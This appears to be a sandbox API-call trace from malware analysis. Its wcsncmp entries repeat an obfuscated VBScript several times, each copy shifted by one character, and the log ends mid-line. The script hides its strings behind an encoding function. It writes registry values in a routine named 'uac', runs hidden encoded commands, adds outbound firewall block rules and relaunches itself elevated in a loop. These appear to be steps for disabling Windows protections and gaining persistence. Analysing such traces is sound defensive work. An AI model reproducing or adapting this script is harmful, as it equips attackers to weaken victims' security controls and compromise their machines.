ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.027] wcsncmp (_String1="ewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.027] wcsncmp (_String1="wRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.027] wcsncmp (_String1="Rule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.027] wcsncmp (_String1="ule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.027] wcsncmp (_String1="le.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 